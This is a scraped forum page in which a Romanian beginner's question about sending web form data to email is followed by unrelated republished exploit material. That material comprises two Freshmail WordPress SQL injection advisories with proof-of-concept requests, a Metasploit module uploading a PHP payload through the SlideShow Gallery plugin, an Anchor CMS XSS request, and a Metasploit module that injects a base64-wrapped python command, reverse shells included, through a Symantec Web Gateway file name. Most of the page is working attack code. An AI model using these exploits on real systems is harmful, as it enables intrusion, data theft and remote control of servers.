Search the Community

Sa povestesc de la inceput, am vazut o 3 pagini web la cineva, mi-au placut, si i le-am cerut. Acum cred ca doar a facut misto de mine, pentru ca cunostinta mea in programare se rezuma la font color="red" Acele pagini au si 2 form-uri, care dupa mintea mea trebuiau sa se duca undeva, intr-un mail. Asa ca m-am apucat sa rup google-ul si yt-ul in 2 cautand cum sa se duca datele in mail-ul meu. Am descarcat zeci de prog si m-am batut cu al'de Apache si C++ pana am ajuns la concluzia ca am nevoie de ajutor specializat. Parerea mea e ca el a mai pastrat niste fisiere in care puteam modifica unde sa ajunga datele(aici fiind partea in care a facut misto de mine). Rugamintea mea din sufletel ar fii sa ma ajute si pe mine cineva care dispune de timp si rabadare; As posta aici codul,daca as stii de unde sa-l iau sau ce sa iau. Da, sunt praf, dar imi dau silinta sa nu mai fiu. Mersi frumos

------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Wordpress SlideShow Gallery Authenticated File Upload', 'Description' => %q{ The Wordpress SlideShow Gallery plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type. }, 'Author' => [ 'Jesus Ramirez Pichardo', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5460'], ['EDB', '34681'], ['WPVDB', '7532'] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [['WP SlideShow Gallery 1.4.6', {}]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 28 2014')) register_options( [ OptString.new('WP_USER', [true, 'A valid username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class) end def user datastore['WP_USER'] end def password datastore['WP_PASSWORD'] end def check check_plugin_version_from_readme('slideshow-gallery', '1.4.7') end def exploit print_status("#{peer} - Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? print_error("#{peer} - Unable to login as #{user}") return end print_status("#{peer} - Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new data.add_part("", nil, nil, 'form-data; name="Slide[id]"') data.add_part("", nil, nil, 'form-data; name="Slide[link]"') data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"') data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"') data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"') data.add_part('file', nil, nil, 'form-data; name="Slide[type]"') data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"') data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"') data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"') data.add_part("", nil, nil, 'form-data; name="Slide[order]"') data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"') data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s print_status("#{peer} - Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'vars_get' => { 'page' => 'slideshow-slides', 'method' => 'save' }, 'data' => post_data, 'cookie' => cookie }) if res if res.code == 200 register_files_for_cleanup(filename) else fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_slideshowgallery_upload.rb.txt

#Affected Vendor: http://anchorcms.com/ #Date: 23/03/2015 #Discovered by: JoeV #Type of vulnerability: XSS #Tested on: Windows 7 #Version: 0.9.2 #Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack. Proof of Concept (PoC): --------------------------- *XSS* --- POST /anchor/index.php/admin/pages/add HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 1003 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp Referer: http://localhost/anchor/index.php/admin/pages/add Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: anchor-install-timezone=-330; anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK; anchorcms-install_payload=ZDYyYjliOTEyMzhlNjJjYmVjZTg0ZmFkNmMxMGRlMDRhOjM6e3M6NDoiX291dCI7YTowOnt9czozOiJfaW4iO2E6MDp7fXM6ODoiaHRhY2Nlc3MiO3M6Mzg4OiJPcHRpb25zIC1pbmRleGVzCgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KCVJld3JpdGVFbmdpbmUgT24KCVJld3JpdGVCYXNlIC9hbmNob3IKCgkjIEFsbG93IGFueSBmaWxlcyBvciBkaXJlY3RvcmllcyB0aGF0IGV4aXN0IHRvIGJlIGRpc3BsYXllZCBkaXJlY3RseQoJUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKCVJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCgoJIyBSZXdyaXRlIGFsbCBvdGhlciBVUkxzIHRvIGluZGV4LnBocC9VUkwKCVJld3JpdGVSdWxlIF4oLiopJCBpbmRleC5waHAvJDEgW0xdCjwvSWZNb2R1bGU%2BCgo8SWZNb2R1bGUgIW1vZF9yZXdyaXRlLmM%2BCglFcnJvckRvY3VtZW50IDQwNCBpbmRleC5waHAKPC9JZk1vZHVsZT4KIjt9; anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="token" 286db1269c0e304c7e435bf10251f950 ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="title" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="redirect" ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="content" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="name" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="slug" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="status" published ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="parent" 1 ------WebKitFormBoundary4w4M5e7r1tBwc2wp-- -- Regards, *Joel V* Source

This Metasploit module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection", 'Description' => %q{ This module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. }, 'License' => MSF_LICENSE, 'Author' => [ 'Egidio Romano', # Original discovery & assist of MSF module 'sinn3r' ], 'References' => [ [ 'CVE', '2014-7285' ], [ 'OSVDB', '116009' ], [ 'BID', '71620' ], [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00'] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Web Gateway 5', {}] ], 'Privileged' => false, 'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014) 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password for the username']) ], self.class) end def protocol ssl ? 'https' : 'http' end def check uri = target_uri.path res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')}) if res && res.body.include?('Symantec Web Gateway') return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def get_sid sid = '' uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'GET', }) unless res fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' sid end def login(sid) uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'POST', 'cookie' => sid, 'headers' => { 'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}" }, 'vars_post' => { 'USERNAME' => datastore['USERNAME'], 'PASSWORD' => datastore['PASSWORD'], 'loginBtn' => 'Login' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to login') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank? # Successful login return sid else # Failed login fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") end end def build_payload # At of today (Feb 27 2015), there are only three payloads this module will support: # * cmd/unix/generic # * cmd/unix/reverse_python # * cmd/unix/reverse_python_ssl p = payload.encoded case datastore['PAYLOAD'] when /cmd\/unix\/generic/ # Filter that one out, Mr. basename() p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))") p = "python -c \"exec('#{p}'.decode('base64'))\"" else p = p.gsub(/python -c "exec/, 'python -c \\"exec') p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"") end p end def build_mime p = build_payload data = Rex::MIME::Message.new data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"') data.add_part('maintenance', nil, nil, 'form-data; name="configuration"') data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""') data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"') data.add_part('', nil, nil, 'form-data; name="restore"') data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"") data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"') data.add_part('0', nil, nil, 'form-data; name="event_horizon"') data.add_part('0', nil, nil, 'form-data; name="max_events"') data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"') data.add_part('', nil, nil, 'form-data; name="testaddress"') data.add_part('', nil, nil, 'form-data; name="pingaddress"') data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"') data.add_part('', nil, nil, 'form-data; name="capture_filter"') data end def inject_exec(sid) uri = target_uri.path mime = build_mime # Payload inside send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/restore.php'), 'method' => 'POST', 'cookie' => sid, 'data' => mime.to_s, 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'headers' => { 'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}" } }) end def save_cred(username, password) service_data = { address: rhost, port: rport, service_name: protocol, protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: self.fullname, origin_type: :service, username: username, private_data: password, private_type: :password }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, last_attempted_at: DateTime.now, status: Metasploit::Model::Login::Status::SUCCESSFUL }.merge(service_data) create_credential_login(login_data) end def exploit print_status("Getting the PHPSESSID...") sid = get_sid if sid.blank? print_error("Failed to get the session ID. Cannot continue with the login.") return end print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") sid = login(sid) if sid.blank? print_error("Failed to get the session ID from the login process. Cannot continue with the injection.") return else # Good password, keep it save_cred(datastore['USERNAME'], datastore['PASSWORD']) end print_status("Trying restore.php...") inject_exec(sid) end end Source